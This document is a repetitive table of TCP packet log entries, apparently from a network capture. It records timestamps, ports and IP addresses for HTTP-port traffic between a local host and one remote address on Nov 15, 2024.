                                                                                                                                                                Nov 15, 2024 10:28:31.111721039 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111721992 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.111732006 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111749887 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.111773014 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.111824036 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111835003 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111845016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111865997 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.112235069 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112246990 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112257957 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112281084 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.112282038 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112293959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112298012 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.112329006 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.112380981 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112391949 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112402916 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112432957 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.112709999 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112720966 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112731934 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112750053 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.112751007 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112762928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112771988 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112782001 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112782955 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.112792015 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112802982 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.112826109 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.112921953 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112931967 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112942934 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112955093 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.112958908 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.112982035 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.113276005 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.113286972 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.113296986 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.113302946 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.113313913 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.113321066 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.113358021 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.113368034 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.113600969 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.113611937 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.113651037 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.113719940 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.113732100 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.113744020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.113754988 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.113766909 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.113782883 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.114337921 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114350080 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114360094 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114371061 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114381075 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114392996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114403009 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114413023 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114422083 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114423037 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.114432096 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114443064 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114454985 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.114460945 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114471912 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114475965 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.114483118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114491940 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.114492893 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114517927 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.114546061 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114556074 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114582062 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.114634991 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114646912 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114658117 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.114675045 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.114701033 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.147866964 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.147881031 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.147891045 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.147927999 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.192373037 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.202419996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.202435970 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.202449083 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.202502966 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.202526093 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.202538013 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.202548027 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.202565908 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.202589989 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.202657938 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.202668905 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.202678919 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.202714920 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.234378099 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234392881 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234404087 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234471083 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234483957 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234494925 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234579086 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234590054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234601021 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234620094 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.234620094 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.234632969 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.234642982 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.234673977 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234684944 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234694958 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234730005 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234738111 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.234741926 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234751940 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234770060 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.234806061 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.234844923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234857082 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234874010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234905958 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234909058 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.234919071 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234929085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234940052 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.234946012 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.234967947 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.235129118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235141039 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235152960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235165119 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.235194921 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.235369921 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235382080 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235408068 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.235500097 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235511065 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235527992 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235538006 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235548973 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235560894 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.235584974 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235589981 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.235596895 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235606909 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235624075 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.235646009 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.235817909 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235829115 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235835075 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235863924 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.235944986 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235964060 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235980988 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.235984087 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.235991955 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236004114 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236049891 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.236049891 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.236278057 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236289024 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236299038 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236309052 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236320972 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236320972 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.236347914 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.236463070 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236502886 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.236507893 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236520052 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236553907 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.236641884 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236653090 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.236689091 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237164974 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237176895 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237189054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237217903 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237263918 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237276077 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237286091 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237304926 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237330914 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237363100 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237374067 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237390041 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237400055 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237417936 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237433910 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237485886 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237514973 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237526894 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237569094 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237581968 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237592936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237605095 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237622023 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237627029 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237664938 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237803936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237818003 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237828016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237838984 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237838984 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237848997 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237859964 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237869978 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237873077 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237881899 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.237898111 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.237916946 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.258014917 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.271224976 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.271250963 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.271261930 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.271337032 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.271384001 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.271384001 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.317472935 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.325792074 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.325809002 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.325820923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.325882912 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.325882912 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.325895071 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.325906992 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.325927019 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.325953007 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.326065063 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.326078892 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.326123953 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.357671976 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.357691050 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.357713938 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.357728004 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.357738972 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.357750893 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.357753992 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.357927084 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.357999086 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358011007 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358022928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358064890 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358078003 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358088970 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358099937 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358114958 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358115911 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358141899 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358160973 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358171940 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358203888 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358223915 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358236074 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358253002 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358264923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358266115 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358277082 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358297110 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358320951 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358351946 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358371019 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358382940 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358392954 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358408928 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358428955 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358484030 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358494997 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358506918 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358546972 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358607054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358618975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358649969 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358665943 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358678102 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358689070 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358700991 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358733892 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358791113 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358803988 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358819962 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358855963 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358870029 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358881950 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.358908892 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.358999014 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.359014988 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.359025955 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.359035969 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.359060049 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.359075069 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.359083891 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.359110117 CET4973680192.168.2.4150.241.95.163
